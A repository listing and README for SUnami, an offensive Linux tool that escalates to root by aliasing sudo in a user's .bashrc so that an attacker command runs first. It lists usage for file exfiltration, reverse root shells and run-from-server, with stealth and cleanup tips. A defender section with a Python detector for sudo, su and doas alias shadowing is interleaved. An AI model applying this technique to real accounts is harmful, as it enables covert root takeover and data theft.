alchemist b2878b72db updated getenvs.sh file 2023-08-08 18:36:14 +03:00
lib added help command; made -listen and -local flag easier to use 2023-08-08 01:04:13 +03:00
templates/rfs updated getenvs.sh file 2023-08-08 18:36:14 +03:00
README.md added help command; made -listen and -local flag easier to use 2023-08-08 01:04:13 +03:00
sunami.py test commit 2 2023-08-08 01:30:02 +03:00

README.md

SUnami

Struggling with Linux privilege escalation? Well then, it's time to cheese it with SUnami.
Zero-interaction privesc is always recommended but not always achievable. For this reason we have created a tool for the most trivial privesc in history (with a few drawbacks).
This is not an exploit, just a cheap but effective trick. The use case is when you have a shell on a sudoers account but no sudo credentials.
It works by aliasing sudo in the user's .bashrc file so that an attacker-specified command is prepended and runs first, in the background.
This does mean you will need to wait for sudo to be executed.
Flags denoted with -- are required; flags denoted with - are optional.
The -local flag denotes that you want sunami to modify the .bashrc file on the current machine instead of producing output (not suggested for stealth reasons).
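
From the defender's side, the sudo aliasing described above leaves a visible trace in the account's shell startup files. The following is an added example, not part of SUnami: a Python check that flags alias or function definitions shadowing sudo, su or doas. The file list, the watched command names and the sample .bashrc are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Assumed watch list: privilege-elevation commands worth alerting on.
NAMES = r"(sudo|su|doas)"
# Assumed set of bash startup files; extend for your distro and shells.
RC_FILES = (".bashrc", ".bash_profile", ".bash_aliases", ".profile")

# alias sudo=..., including a later name in "alias a=b sudo=..."
ALIAS_RE = re.compile(rf"\balias\s.*?(?<![\w./-]){NAMES}=")
# sudo() { ... }  or  function sudo { ... }
FUNC_RE = re.compile(rf"(?:^|[;&]\s*)(?:function\s+{NAMES}\b|{NAMES}\s*\(\s*\))")

# Constructed sample input, not taken from a real host.
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
alias ll='ls -alF'
alias sudo='echo constructed-placeholder & sudo'
# alias sudo='commented out'
alias visudo='visudo -c'
function su { echo constructed-placeholder; command su "$@"; }
export EDITOR=vim
"""

def scan_text(text, source="<sample>"):
    """Return (source, line number, kind, shadowed name, line) tuples."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank or fully commented-out line
        for kind, rx in (("alias", ALIAS_RE), ("function", FUNC_RE)):
            m = rx.search(line)
            if m:
                name = next(g for g in m.groups() if g)
                findings.append((source, lineno, kind, name, line))
    return findings

def scan_home(home):
    """Scan every startup file in RC_FILES that exists under one home directory."""
    out = []
    for rc in RC_FILES:
        path = Path(home) / rc
        if path.is_file():
            out += scan_text(path.read_text(errors="replace"), str(path))
    return out

if __name__ == "__main__":
    for src, lineno, kind, name, line in scan_text(SAMPLE_BASHRC):
        print(f"{src}:{lineno}: {kind} shadows '{name}': {line}")
```

The check covers only alias and function shadowing in the listed files. In an interactive shell, `type sudo` shows what the name currently resolves to.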

Authors

witchdocsec, TheA1ch3m1st

Notice

Using the shells and socket-based exfil will throw an error in the target's shell if your listener isn't active. Be sure to clean up after gaining root. For the most stealth with file exfil, we suggest the built-in Flask server. Currently our built-in listener works best with bash shells. For nc shells, using nc's own listener is recommended.

File Exfiltration

I used passwd so as not to leak my hash for this demo, but rest assured you can read whatever file you wish.

usage:

sunami.py [-local {1,0}] exfilfile [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]

Root Shell

usage:

sunami.py [-local {1,0}] genshell [--ip IP] [--port PORT] [-shell SHELL] [-protocol PROTOCOL] [-listen {1,0}]

Run From Server

usage:

sunami.py [-local {1,0}] rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]